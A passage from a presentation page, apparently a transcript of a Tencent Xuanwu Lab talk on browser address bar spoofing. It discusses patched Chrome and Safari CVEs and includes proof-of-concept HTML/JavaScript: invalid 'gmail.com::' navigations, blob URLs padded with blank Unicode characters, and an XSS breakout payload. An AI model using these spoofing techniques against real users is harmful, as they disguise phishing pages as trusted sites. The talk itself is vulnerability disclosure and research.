现代浏览器地址栏之困 腾讯玄武实验室 徐少培.

Slides:



Advertisements
Similar presentations
第一章 餐饮服务程序 学习目的: 掌握餐饮服务四个基本环节的内容 正确表述和运用各种餐饮形式的服务程序 熟悉并利用所学知识灵活机动地为不同需求的 客人提供服务.
Advertisements

一、老师申请题目,以下指导老 师操作。 1. 登录教务系统 web 端. 2. 点击 “ 毕业设计 ” 工具栏下拉菜单中的 “ 论文 _ 教师申请题目 ”
钱富宝 V1.5.0 版本 APP 用户手册 钱富宝 APP 下载地址:
Android App簡介及 App Inventor 2體驗 靜宜大學資管系 楊子青
强力打造湖北农业信息网 全面推进湖北农村信息化
黄金时代 黄金时代:老子,释迦牟尼,苏格拉底,孔子,庄子,耶稣…… 他们是人类智慧的顶峰,他们用人生展示了智慧与慈爱。
第四章 商代之舞蹈 本檔案圖片來源:google圖片.
網站「開外掛」 優化營業人員的戰鬥力 介紹 Web365行動展售網站系統的10大特色
嗇色園主辦可立小學 故宮 製作日期:2011年3月21日.
研商「99年宜蘭縣相關單位同步滅鼠工作」執行事宜
狂犬病 保護你我,愛護動物 武漢國中 黃憶暄.
迪士尼動畫 玩具總動員1.
第十六章 股票交易資訊分析與試算 課前指引 目前最熱門的理財方式莫過於投資股票市場,因此本章首先講解如何從美國股市匯入重要資料,之後教授使用WEB查訊功能,匯入台灣股市即時或盤後交易資訊到Excel工作表中,再利用資料分析工具來協助瞭解個股。最後再利用Excel圖表功能來繪製成股票K線圖,這是不是很有趣及實用呢?
課程實錄.
第八章 了解法律制度 自觉遵守法律.
石家庄迅步网络科技有限公司 联系人:张会耀 电话:
第八章 网络课程的设计与开发.
動物的繁殖行為.
5,2 新时代的劳动者.
105年臺北市 優先免試入學 高中職免試入學 五專免試入學 報名方式宣導
自 我 簡 介 ◆服務學校:臺中市后里區七星國民小學 ◆職 稱:總務主任(3年)
行動報告人:丁俊源 行動參與人和單位: 我們全家人 社區鄰居、管委會 新北市環保局
各班請選出三張學習單交到輔導室參加評選。
樹人醫專 暑假原住民夏令營.
105學年度綜合高中諮詢輔導專案 輔導手冊填寫說明會
劳模的风采.
俄语字母的发音体系 阅读规则.
数帅无线网盘产品用户指南 IOVSTWIFIDiskProduct User Guide 型号:PA521i.
互联网时代班主任的挑战 万玮 2014年9月20日.
單車失竊記心得.
圖書館的創意服務 「創意、出版、圖書館經營」研討會 姜 義 臺 靜宜大學蓋夏圖書館
2017/9/10 國防大學理工學院 102年度教師節表揚茶會 優良教師事蹟介紹.
班級:觀光一B 姓名:李詩涵 座號: 18 指導老師:杜光玉
前不久看到了这样一则报道:某个大学校园里,一个大学生出寝室要给室友留一张字条,告诉他钥匙放在哪里。可是“钥匙”两个字他不会写,就问了其他寝室的同学,问了好几个,谁也不会写,没办法,只好用“KEY”来代替了。 请大家就此事发表一下自己看法。
模块七 信息获取与发布 第8章 计算机网络信息的获取与发布.
苏州大汇信息科技有限公司 招聘简介.
跨校選課 說明會 主辦人:[國文系學會學權股] 葉軒如、李美玟.
一种营销模式的转型,一种全新的金融房贷模式
利用共同供應契約 辦理大量訂購流程說明.
鄉村尋根-農具篇.
绿豆芽科技 让科技融入生活. 绿豆芽科技 让科技融入生活 让天下没有非互联网的公司 传统行业公司 新型科技公司 绿豆芽科技 产品研发 供应链 渠道 物联网硬件 云计算平台 APP应用 传统优势 竞争力 用户体验 团队由数十名硕士生及博士生组成,有着在德州仪器、中兴等知名企业的工作经历,项目经验丰富。团队成员获得过:电子设计竞赛国家一等奖、“Intel杯”嵌入式邀请赛冠军、“微软创新杯”
Lesson 2 十分钟完成照片雕刻 建议您用大屏幕观看教学,并同时用手机进行操作 官方网站 : cubiio.muherz.com
教務行政資訊系統 簡介 資訊科技中心 資訊系統組 徐振琦
福智 學員平台 2018/6/9 幹部月會 羅東教室.
稅知多少.
语文专题课 执教者: 平望二中 黄小林 视频.
105年度 大專校院校外實習學生 團體保險 第一產物保險股份有限公司 營業二部 蔡承瑋.
1 意见反馈与问题解答 4 1.
人社學院 通識教育中心 邱子恒 網際網路資源之檢索與評選 人社學院 通識教育中心 邱子恒
新生若系統尚未開放使用,可先行於銀行對保後先將相關資料繳回學校,待系統開放後再到學校系統辦理申請作業
小学生交通安全主题班会课件 安全 security 上派学区中心校校园安全管理办公室.
網站HOLMES DATA監測代碼.
 协同工作,共创辉煌 New Media , New Chance.
  Google    雲端技術   曹晉翊 | 陳正偉 | 施泓銘 | 郭軒志 | 王士豪.
稅知多少 國家的重要基礎.
105學年第1學期期初校務會議 圖書館工作報告 報告人: 林佩佳主任.
兒童及少年保護、 家庭暴力及性侵害事件、 高風險家庭 宣導與通報
Unity回傳統計資訊程式說明: 填寫回傳資訊網址(theUrl)。
岗位聘任管理系统使用说明 浙江师范大学人事处 咨询电话: 、
教育處資訊服務入口 功能簡介.
全陽圓格局位置最好的A6-2樓 面中庭花園3房2廳2衛三面採光 捷運藍線江子翠捷運站1號出口Google距離210公尺
103學年度第1學期新北市 政府辦理弱勢幼兒教育津貼 作業說明會 承辦人員:塗彥凱(分機2800)
線上評鑑系統操作手冊 1.安裝google chrome 2.評鑑系統申請及操作 不怎麼帥的帥哥製作.
103年度 大專院校校外實習學生 團體保險 第一產物保險股份有限公司 營業二部 蔡承瑋 1.
104學年度 進修學校期初工作報告.
108年度獎勵私立老人福利機構及補助團體、財團法人老人福利機構提供多元及充實服務方案實施計畫(獎勵私立老人福利機構部分) 申請說明會
【學雜費減免】 學務系統 線上申請步驟 學校網頁和系統 皆需以IE瀏覽器開啟 (不適用Google Chrome 或其他瀏覽器)
姓名:刘冰 专业:计算机科学与技术 指导教师:姚宣霞
如何著手入門MyLion 如何下載和註冊 讓我們來談談如何確保所有獅友知道如何下載和註冊app。.
Section 1 Basic concepts of web page
Presentation transcript:

现代浏览器地址栏之困 腾讯玄武实验室 徐少培

我是谁 Web/浏览器安全研究@ 作者@《Web前端黑客技术揭秘》 xisigr@gmail/twitter/weibo

地址栏的重要性 We recognize that the address bar is the only reliable security indicator in modern browsers. --Google Security Team[1] [1]https://www.google.com/about/appsecurity/reward-program/

安全指示符上的反思

你会点开安全指示符吗?

小屏幕地址栏的挑战

URL URL标准目前由whatwg维护[1] URL经过20多年的发展其定义在不断扩大,很多现代的主题也开始被URL规范所覆盖。 将URI[RFC3986][2]和IRI[RFC3987][3]与现代接轨,并逐步淘汰。 使得对’网址’一词进行标准化。URL / URI / IRI URL的解析应该向HTML解析一样坚固 [1] https://url.spec.whatwg.org/ [2] https://tools.ietf.org/html/rfc3986 [3] https://tools.ietf.org/html/rfc3987

URL组成

Address Bar Spoofing https://login.your-bank.com.evil.com/login.your-bank.com

Address Bar Spoofing 伪造了Web最基本的安全边界,起源(orgin) 2018/11/8 Address Bar Spoofing 伪造了Web最基本的安全边界,起源(orgin) Orgin=scheme+hostname+port 但人们(包括开发人员)往往不了解起源的概念,而更倾向于理解主机(hostname)的概念。 UI简化:忽略scheme(或图标替换)/port(默认80) 可伪造的主机包括什么? 域名[RFC1034] IP:IPv4[RFC791]/IPv6[RFC4291] 只要伪造了主机,就可以认为这是一个Address Bar Spoofing漏洞。

Address Bar Spoofing

Address Bar Spoofing漏洞案例

CVE-2016-1707 漏洞介绍 漏洞名称 Chrome Address Bar URL Spoofing On IOS 受影响产品 Chrome < v52.0.2743.82,IOS < v10 漏洞公告 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1707 发现者 xisigr 漏洞赏金 3000$

2018/11/8 CVE-2016-1707

CVE-2016-1707 key payload <body>Spoof</body> <script> payload=“key payload"; function pwned() { var t = window.open('', 'new'); t.document.write(atob(payload));} </script> <button onclick="pwned()">click me</button> key payload <body>Spoof</body> var link = document.createElement('a'); link.href = 'https://gmail.com::'; document.body.appendChild(link); link.click();

CVE-2016-1707 key payload发生了什么 ①, 跳转到一个新页面时,chrome允许对‘https://gmail.com::’进行加载。 这是错误的开始,加载了一个无效地址,并未对无效地址做任何处理 ②, 页面开始加载'https://gmail.com::' ,因加载的是一个无效的地址,于是地址栏处于一个挂起的状态(pending entry). ③, 当内容开始返回时,调用‘about:blank’,但此时chrome还处于一个挂起状态 (‘https://gmail.com::’) ,并且把‘https://gmail.com::’ 作为了最终的提交地址。 ④, 页面加载完毕。一个Address Bar Spoofing漏洞诞生了。

CVE-2016-5189 漏洞介绍 漏洞名称 Chrome Address Bar URL Spoofing with Blob-URLs 受影响产品 Google Chrome < 54.0.2840.59 for Windows,Mac,Linux. 54.0.2840.85 for Android 漏洞公告 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5189 发现者 xisigr 漏洞赏金 500$

CVE-2016-5189

CVE-2016-5189 <script> function pwned() { var t = window.open('', 'new'); t.document.write("<h1>phishing page</h1><title>google</title>"); t.stop();} </script> <a href=“key payload" target="new" onclick="setTimeout('pwned()','500')">click me1</a> <a href=“key payload" target="new" onclick="setTimeout('pwned()','500')">click me2</a> key payload (1) blob:http://www.google.com%EF%BE%A0……@xisigr.com //Unicode U+FFA0 (2) blob:http://www.google.com …………@xisigr.com //空格

CVE-2016-5189 key payload发生了什么 Chrome 渲染了Blob-URLs的用户名和密码部分,这是极其危险的。 2018/11/8 CVE-2016-5189 key payload发生了什么 Chrome 渲染了Blob-URLs的用户名和密码部分,这是极其危险的。 一个URL的用户名和密码不应该被渲染,因为它们可以被误认为是一个URL的主机。 https://examplecorp.com@attacker.example/ Unicode字符(比如U+0020 、U+FFA0),在Chrome地址栏中将显示空白。大量的空白字符覆盖了真实的主机。

CVE-2016-5222 漏洞介绍 漏洞名称 Chrome Address Bar URL Spoofing 受影响产品 2018/11/8 CVE-2016-5222 漏洞介绍 漏洞名称 Chrome Address Bar URL Spoofing 受影响产品 Chrome < v55.0.2883.75 for Winows/MAC/Linux 漏洞公告 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5222 发现者 xisigr 漏洞赏金 500$

CVE-2016-5222

CVE-2016-5222 <a href="key payload">Right Click</a> (1)google.com:: (2)www.google.com::/url?q=http%3A%2F%2Fxisigr.com%2Ftest%2Fspoof%2Fchrome%2F3.html&sa=D&sntz=1&usg=AFQjCNG-QnLGG1ixIlOzlpZQn5cweSU3Cw

CVE-2016-5222 key payload发生了什么 通过右键在新窗口打开页面,Chrome允许加载(google.com::)一个无效的地址。 加载(google.com)返回页面,并将(google.com:)作为最后提交地址。 之后的重定向不会触发(google.com:)被更新 加载完毕。一个Address Bar Spoofing漏洞诞生了。

CVE-2017-2517 漏洞介绍 漏洞名称 Apple Safari Addressbar Spoofing with Search Engines on IOS 受影响产品 Safari, IOS < 10.3.3 漏洞公告 https://support.apple.com/zh-cn/HT207923 发现者 xisigr 修复时间 报告日期2016/2/1 修复日期2017/7/20

CVE-2017-2517

CVE-2017-2517 <a href="https://www.baidu.com/s?word=key payload">Click me</a> key payload (1) accounts.google.com (2) www.google.com ……XSS Payload (3) spoof.com "><body style="background:red;visibility:hidden;"></body>

CVE-2017-2517 key payload发生了什么 Safari的URL地址栏和搜索栏是合并在一起的,在设置中可选择默认搜索引擎:如谷歌、雅虎、必应、百度、DuckDuckGo…… 当在默认搜索引擎中搜索的内容是网址的时,URL地址栏显示的将是这个网址。 如果这个搜索引擎存在XSS的情况下,攻击者可以使URL地址栏中为任意URL,并更改页面内容。 这样就完成了一次URL地址栏欺骗攻击。

Address Bar Spoofing漏洞挖掘奥义 地址栏之困 浏览器地址栏是个矛盾体,它提供两个相互竞争的角色:你在哪和你要去哪。它只能显示其中的一个。而地址栏恰是困于这两个角色的转换之中。 深刻理解地址栏之困,即是挖掘Address Bar Spoofing漏洞的核心奥义。

QA 公众号和微博"腾讯玄武实验室" 每天推送国际最新安全技术资料